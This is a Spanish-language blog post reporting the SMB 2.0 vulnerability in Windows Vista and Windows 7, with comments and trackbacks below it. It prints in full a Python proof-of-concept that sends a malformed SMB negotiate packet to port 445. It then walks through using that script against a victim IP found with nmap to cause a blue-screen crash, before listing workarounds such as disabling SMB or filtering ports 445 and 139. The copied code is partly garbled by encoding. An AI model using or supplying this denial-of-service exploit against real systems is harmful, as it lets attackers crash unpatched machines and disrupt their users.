Leyendo securitybydefault me encuentro con esta importante noticia, recientemente se encontro un fallo de seguridad en el protocolo SMB de Windows Vista y Windows 7, este es el encargado de compartir archivos e impresoras en los sistemas operativos de microsoft. Este bug, permite hacer un ataque DoS (e incluso es posible la ejecucion remota de codigo) de forma remota mandando un paquete malformado. El ataque sera reflejado en el PC victima con el ya conocido, tipico y normal “error de pantalla azul”, obligandolo a reiniciar.
Laurent Gaffié, quien descrubrio esta vulnerabilidad, ha creado un pequeño codigo en python, que permite explotar dicho bug, lo unico necesario es tener la IP victima, y que este por obvias razones este compartiendo archivos o impresoras, es decir, que tenga activado el protocolo SMB 2.0 . el codigo es el siguiente:
#!/usr/bin/python
#When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA errorfrom socket import socket
from time import sleephost =”direccion_ip”, 445
buff = (
“x00x00x00x90″ # Begin SMB header: Session message
“xffx53x4dx42″ # Server Component: SMB
“x72x00x00x00″ # Negociate Protocol
“x00x18x53xc8″ # Operation 0×18 & sub 0xc853
“x00x26″# Process ID High: –>normal value should be “x00x00″
“x00x00x00x00x00x00x00x00x00x00xffxffxffxfe”
“x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54″
“x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31″
“x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00″
“x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57″
“x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61″
“x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c”
“x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c”
“x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e”
“x30x30x32x00″
)
s = socket()
s.connect(host)
s.send(buff)
s.close()Para lanzarlo basta con ./archivo.py
No sobra decir, que este bug, no afecta versiones anteriores de Windows.
Prueba de concepto.
Antes que nada, es necesario advertir, que esta prueba se hace con el UNICO fin de educar y alertar a los usuarios de Microsoft Windows, para que esten atentos y tomen las medidas pertinentes para no ser victimas de algun l@mmer lanzando ataques a diestra y siniestra.
El escenario es el siguiente:
Previamente se ha identificado nuestro objetivo, se ha obtenido su ip la cual es 192.168.8.120, gracias a un nmap estamos seguros de que sus sistema operativo es Windows Vista y que tiene SMB activado.
Teniendo clara la ip de nuestra victima, modificamos el codigo en python y ponemos nuestra ip victima en este caso 192.168.8.120, guardamos, procedemos a darle permisos a nuestro archivo y por ultimo lo ejecutamos:
chmod 777 archivo.py
./archivo.py
Como resultado en nuestra pc victima saldra un BSOD (Blue Screen of death), algo similar a este:
Soluciones.
Hasta el momento no existe parche por parte de Microsoft, sin embargo, este grave problema se puede solucionar de manera provisional deshabilitando SMB. o en su defecto filtrando los puertos 445 y 139. Asi que todos los usuarios de windows esten pendientes de este fallo y actualicen su sistema lo antes posible, para evitar daños y perdidas de informacion
<strong>Información Bitacoras.com…</strong>
Valora en Bitacoras.com: Leyendo securitybydefault me encuentro con esta importante noticia, recientemente se encontro un fallo de seguridad en el protocolo SMB de Windows Vista y Windows 7, este es el encargado de compartir archivos e impresoras e…
jajajaja vea pues… interesante noticias gracias don Epsilon
[...] que anteriormente se han hecho publicos algunos fallos que afectan este mismo protocolo como la vulnerabilidad BSOD (pantallazo azul) que afectaba a Windows Vista, Windows 7 y Windows server 2008 AKPC_IDS += "2069,"; Si te gusto la [...]
[...] Esta nueva versión (que se encuentra en pruebas) trae consigo (como bien acostumbrados nos tiene la gente de Insecure.ORG) novedades muy interesantes como por ejemplo un Script que chequea si la “victima” soporte SMBv2 para poder explotar cierto problema que tienen algunos Sistemas Operativos. [...]